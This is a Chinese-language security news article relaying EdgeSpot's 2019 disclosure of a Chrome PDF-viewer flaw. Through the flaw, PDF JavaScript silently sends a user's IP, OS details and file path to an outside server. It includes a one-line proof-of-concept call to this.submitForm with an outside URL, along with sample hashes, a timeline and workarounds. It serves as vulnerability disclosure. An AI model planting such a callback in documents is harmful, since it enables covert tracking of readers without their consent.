Chrome 被曝 0day!通过 PDF 文件即可窃取用户信息(无补丁,来看细节)
编译:代码卫士团队
2018年12月,EdgeSpot 公司检测到多个 PDF 样本在野利用 Chrome 浏览器的一个 0day 漏洞。它可导致 PDF 的发送人追踪用户并在用户使用 Chrome 作为本地 PDF 查看器时收集某些用户信息。
详细分析
研究人员指出,在 Adobe Reader 中打开这些样本时,显示“没问题”,但在 Chrome 本地打开时会产生可疑的出站流量。本文将以其中一种典型的样本作为例子详细分析:
https://www.virustotal.com/#/file/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/detection
(首次提交时间2017年10月1日,文件名为 “honduras-bginfo.pdf”)
EdgeSpot 公司表示,公司引擎将样本检测为“潜在的 0day 攻击 (Google Chrome),个人信息泄漏”,如下图所示:
https://edgespot.io/analysis/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/
在本地磁盘通过 Chrome 打开时,如下所示。
通过捕获后台流量,研究人员观测到一些出站流量,且数据被发送至域名 “readnotify.com”,而并未出现用户交互,换句话说,数据是在未获得用户同意的情况下静默发送出去的。
该流量是一个 HTTP POST 数据包,如下 Wireshark 窗口所示。
该 PDF 样本在用户查看时,在后台“发回通信”。
HTTP 数据包显示,用户的如下信息可能遭恶意发送人员收集:
用户的公共 IP 地址
操作系统、Chrome 版本等(在 HTTP POST 头部)
PDF 文件在用户计算机上的完整路径(在 HTTP POST 有效负载中)
近期,研究人员还发现了一些其他的 PDF “发回通信”的 0day 问题,包括在去年11月发现并披露的问题(ITW 0day 攻击),以及最近发现的一个案例。但在这次所观测到的案例中,新的样本具有一些不同之处:
1. 该样本影响 Google Chrome (作为本地 PDF 查看器的情况),不影响 Adobe Reader。
2. 该样本不允许 NTLM 窃取,但会暴露用户的操作系统信息和本地磁盘上文件的路径。
分析该样本后,研究人员在 stream-1 中发现了一些可疑的 Javascript 代码。
混淆代码后,研究人员发现问题的根因在于 “this.submitForm()” PDF Javascript API。研究人员以最小的 PoC 进行了测试,简单的 API 调用如 “this.submitForm(‘http://google.com/test’)” 将导致 Chrome 将个人数据发送给 google.com。
报告时间轴
漏洞报告的时间轴如下:
2018-12-26:向谷歌报告研究结果。
2019-02-12:检测到更多样本。
2019-02-14:和 Chrome 团队进行多次沟通后,获悉该问题将在4月末修复。通知 Chrome 团队关于这篇文章的发布情况。
2019-02-26:本文发布。
补丁尚无
研究人员指出,之所以在补丁发布前公布自己的研究成果,目的是为了更好地让受影响用户获悉/警觉存在的潜在风险,因为补丁尚未发布,而已出现在野利用/样本。
作为临时的“变通措施”,研究人员建议受影响用户在 Chrome 修复问题之前,使用其它的 PDF 查看器,或者在 Chrome 中打开 PDF 文档时断网。
样本
研究人员表示,将首个样本告知谷歌后,还找到了更多和该漏洞相关的样本。他们共找到了两类样本。第一类是具有类似在野文件名称的样本将数据发送给域名“readnotify.com”且所有的样本都于2017年10月1日出现在 VirusTotal 上,这可能表明它们源自同一个来源。它们是:
https://www.virustotal.com/#/file/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/detection
https://www.virustotal.com/#/file/286ed6d0261aed1115e06e2e8cf0af840297241e9dc9494a496a2c8b75457749/detection
https://www.virustotal.com/#/file/a21a4fcc75cd20a0965f1673b98c0dd688711c40cbabf92a5e5cd1f31a7ac684/detection
https://www.virustotal.com/#/file/1d151793f521419c1470079a37b1e37b8b59a5b69a5506f1d0dbee6f3995b25d/detection
https://www.virustotal.com/#/file/0c3e8efd667f7ff1549bfd2a4498105cb2607314d73b7105f4c1d747d7341090/detection
https://www.virustotal.com/#/file/fb56efe75f3b4509d5a2e0655536d9dab121798d92b8660121bd4691265a87e3/detection
https://www.virustotal.com/#/file/622624d6f161b7d2fa7859d46792dd6bb49024b432b04106b1818510a2037689/detection
第二类样本只有一个,在2018年9月26日出现在 VirusTotal 上,它收集个人信息并将其发送至
“http://zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”。
https://www.virustotal.com/#/file/0cc1234c981806dd22e0e98e4be002e8df8d285b055e7f891ff8e91af59aee1e/detection
推荐阅读
原文链接
https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html
本文由代码卫士编译,不代表其观点,转载请注明“转自代码卫士 www.codesafe.cn”。